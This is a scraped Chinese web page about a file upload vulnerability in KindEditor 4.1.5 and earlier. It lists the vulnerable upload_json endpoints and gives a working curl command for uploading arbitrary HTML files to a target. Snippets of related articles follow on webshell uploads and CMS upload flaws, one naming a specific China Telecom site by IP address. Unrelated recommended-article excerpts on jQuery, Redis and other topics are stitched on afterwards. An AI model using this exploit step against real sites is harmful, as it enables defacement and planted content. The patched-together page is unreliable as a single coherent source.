kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerability and use

漏洞存影响版本:小于等于4.1.5的kindeditor 编辑器

漏洞影响:上传任意. txt 和. html 文件

漏洞存在动态脚本语言: php/asp/jsp/asp.net

漏洞存在的证明文件:upload_json.*  具体路径如下:

/kindeditor/asp/upload_json.asp

/kindeditor/asp.net/upload_json.ashx

/kindeditor/jsp/upload_json.jsp

/kindeditor/php/upload_json.php

利用方式:

curl -F "imgFile=@1.html" http://url/kindeditor/asp/upload_json.asp?dir=file

1.html为想要上传的文件

在返回中得到上传后的路径,然后访问

kindeditor&lt&semi;&equals;4&period;1&period;5文件上传漏洞

最近发现很多网页篡改与暗链都是利用kindeditor编辑器,于是搜了一下kindeditor的漏洞,发现低于4.1.5版本的存在文件上传的漏洞,可以上传txt,html后缀的文档,许多恶意的文档貌似 ...

初级安全入门—— WEBshell与文件上传漏洞

概念介绍 WebShell网页木马文件 最常见利用文件上传漏洞的方法就是上传网站木马(WebShell)文件,根据开发语言的不同又分为ASP木马.PHP木马.JSP木马等,该木马利用了脚本语言中的系统 ...

【代码审计】UKCMS&lowbar;v1&period;1&period;0 文件上传漏洞分析

0x00 环境准备 ukcms官网:https://www.ukcms.com/ 程序源码下载:http://down.ukcms.com/down.php?v=1.1.0 测试网站首页: 0x0 ...

【原创】JEECMS v6~v7任意文件上传漏洞(1)

文章作者:rebeyond 受影响版本:v6~v7 漏洞说明: JEECMS是国内Java版开源网站内容管理系统(java cms.jsp cms)的简称.该系统基于java技术开发,继承其强大.稳定 ...

web安全之文件上传漏洞

成因: 当文件上传时,若服务端脚本语言未对上传的文件进行严格验证和过滤,若恶意用户上传恶意的 脚本文件时,就有可能控制整个网站甚至是服务器,这就是文件上传漏洞. 权限: 1. 后台权限:登陆了后台,可 ...

Web应用安全之文件上传漏洞详解

什么是文件上传漏洞 文件上传漏洞是在用户上传了一个可执行的脚本文件,本通过此脚本文件获得了执行服务器端命令的功能,这种攻击方式是最为直接,最为有效的,有时候,几乎没有什么门槛,也就是任何人都可以进行这 ...

文件上传漏洞演示脚本之js验证

文件上传漏洞演示脚本之js验证 0 0       716   关于文件上传漏洞,想必玩web安全的同学们都有接触,之前本站也发布过一篇文章介绍文件上传漏洞的各种绕过方法,但是只是有文档却没有演示代码 ...

中国电信某站点JBOSS任意文件上传漏洞

1.目标站点 http://125.69.112.239/login.jsp 2.简单测试 发现是jboss,HEAD请求头绕过失败,猜测弱口令失败,发现没有删除 http://125.69.112. ...

CKFinder 1&period;4&period;3 任意文件上传漏洞

CKFinder 是国外一款非常流行的所见即所得文字编辑器,其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件. CKFinder在上传文件的时候,强制将文件名(不 ...

随机推荐

il c井

base.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; 将resource 替换成 fileComplier 生成的 resx(可以 ...

jquery固定在顶部的导航菜单

体验效果:http://hovertree.com/texiao/jquery/6.htm HTML文件代码: /p>

DFS HDOJ 2614 Beat

题目传送门 /* 题意:处理完i问题后去处理j问题,要满足a[i][j] <= a[j][k],问最多能有多少问题可以解决 DFS简单题:以每次处理的问题作为过程(即行数),最多能解决n个问题, ...

JavaScript空判断

if(backInfo != "" && backInfo != null && typeof(backInfo)!="undefined ...

ServiceStack&period;Redis常用操作 - 事务、并发锁

一.事务 使用IRedisClient执行事务示例: using (IRedisClient RClient = prcm.GetClient()) { RClient.Add("key&q ...

redis加入windows服务自启动

今天研究了下redis,很简单 下载减压就可以用,但是自启动搞了好久! 直接sc create redis binPath = D:redis/redis-server.exe start = aut ...

UITableView表格操作

UITableView[表格视图] UITableView是表格视图,是UIScrollView的子类,非常重要. 一.表格视图常用属性 1.基本属性方法 创建一个tableView //    UI ...

IdentityServer4 配置负载均衡

如果使用 IdentityServer4 做授权服务的负载均衡,默认情况下是不可以的,比如有两个授权服务站点,一个资源服务绑定其中一个授权服务(Authority配置),如果通过另外一个授权服务获取a ...

理解线程池到走进dubbo源码

引言 合理利用线程池能够带来三个好处. ​ 第一:降低资源消耗.通过重复利用已创建的线程降低线程创建和销毁造成的消耗. ​ 第二:提高响应速度.当任务到达时,任务可以不需要等到线程创建就能立即执行. ...

使用springboot actuator监控应用

微服务的特点决定了功能模块的部署是分布式的,大部分功能模块都是运行在不同的机器上,彼此通过服务调用进行交互,前后台的业务流会经过很多个微服务的处理和传递,出现了异常如何快速定位是哪个环节出现了问题? ...

kindeditor在服务器上上传图片显示叉叉,什么原因?,kindeditor=4.1.5 文件上传漏洞利用...相关推荐

  1. 【《编辑器篇》kindeditor 文件上传漏洞利用】

    <编辑器篇>kindeditor 文件上传漏洞利用             一.漏洞描述 KindEditor是一套开源的HTML可视化编辑器,其采用的开发语言支持asp.aspx.php ...

  2. 常见文件上传漏洞利用

    常见文件上传漏洞利用 一.常见文件上传绕过方法 1.前端javascript校验文件名 2.MIME类型检测绕过 3.大小写绕过 4.双写.点.空格绕过 5.特殊后缀名绕过 6.文件内容检测 7.使用 ...

  3. 文件上传漏洞利用介绍

    目录 文件上传漏洞利用介绍 1.绕过js验证 2.绕过MIME-TYPE验证 3.绕过基于黑名单验证 基于文件后缀名验证介绍 基于文件后缀名验证方式的分类 基于黑名单验证代码分析 利用apache配置 ...

  4. 『原创』ewebeditor 2.1.6 上传漏洞利用工具

    朋友说原来的ewebeditor 2.1.6 HTML版用着太麻烦,每次还得输入地址,叫我帮忙写一个...- -||| ewebeditor 2.1.6 上传漏洞利用工具 ewebeditor在网上用 ...

  5. hp服务器的网络显示红叉,惠普笔记本白屏后重启后显示红叉网络信号联不上网的原因?...

    满意答案 您好!感谢您选择惠普产品. 机器显示红叉通常是机器的无线服务或无线网卡驱动方面出现问题导致,建议您可以按下面的方法操作解决问题: 1.确认无线服务是否开启,方法:请您在开始菜单中点击&quo ...

  6. asp.net怎么写上传图片到mysql的页面_【web安全】文件上传漏洞

    文件上传漏洞● 0x00 什么是文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力.利用上传漏洞可以直接得到WEBSHELL,危害等级超级高.上 ...

  7. [应用漏洞]KindEditor<=4.1.5 文件上传漏洞利用

    一.KindEditor KindEditor 是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果 二.漏洞介绍 影响版本:KindEditor 3.5.2~4.1 简介:K ...

  8. 《编辑器篇》kindeditor 文件上传漏洞利用

    前言~ 只要你静下心来 你能做好绝大多数事情 目录导航 漏洞描述 漏洞条件 实战利用 修补方案 一.漏洞描述 KindEditor是一套开源的HTML可视化编辑器,其采用的开发语言支持asp.aspx ...

  9. (21)【后端黑白名单绕过】【WEB 漏洞利用/原理】不懂原理都是没灵魂的方法躯壳?文件上传漏洞利用过程

    目录 后端黑名单绕过 特殊可解析后缀 原理:就是加上数字等,但是可以被当做原来的类型进行执行 利用过程: .htaccess解析 原理:上传.htaccess文件到指定的目录,重写当前目录下的解析规则 ...

最新文章

  1. .net core 2.0 HTTPS request fails using HttpClient 安全错误
  2. 文件目录Android SDK目录结构
  3. Linux下修改mysql root密码
  4. 如何比较对比两张图片差异(判断是不是同一张)== all
  5. Java StringBuffer与StringBuider
  6. asp.net(c#)两时间段每天是星期几,周几(时间段日历显示)的问题解
  7. Docker-HealthCheck指令探测ASP.NET Core容器健康状态
  8. Android之手机出现已安装了存在签名冲突的同名数据包的原因及解决办法
  9. 碎玻璃:诊断生产Cassandra问题
  10. python二维数组换行输出_关于用python绘制二维数组的问题
  11. 托管式服务网格:多种类型计算服务统一管理的基础设施
  12. 新仓库无线AP手持连接故障
  13. AI科学计算领域的再突破,昇思MindSpore做“基石”的决心有多强?
  14. 小米冲击高端,这次能否成功?
  15. python数据建模工具_python数据分析工具——Pandas、StatsModels、Scikit-Learn
  16. 【NOIP校内模拟】T2 字胡串(分治)
  17. 【第115期】零基础学做游戏制作_搭环境Unity hub
  18. 西游记不单单讲的是故事(1) ------ 摘自 吴闲云的《煮酒探西游》
  19. MFC:读取整个记事本文件
  20. 跨性別/偽娘/性轉漫畫中譯對照

热门文章

  1. element ui 选项卡切换_基于element-ui实现标签选项卡
  2. java获取数据库时间12或13小时
  3. 数据恢复:在 Linux 上恢复删除了的文件
  4. JavaScript中常见的几种“缺少对象”错误
  5. Unix时间戳来源含义及与标准时间的互相转换(Python)
  6. 勒索病毒频发下如何防勒索病毒
  7. hasOwnProperty用来干嘛的
  8. 加热不燃烧技术路线之争:IQOS对比IUO
  9. SpringBoot-国际化
  10. 【北邮】计算机组成原理实验:实验一 运算器组成实验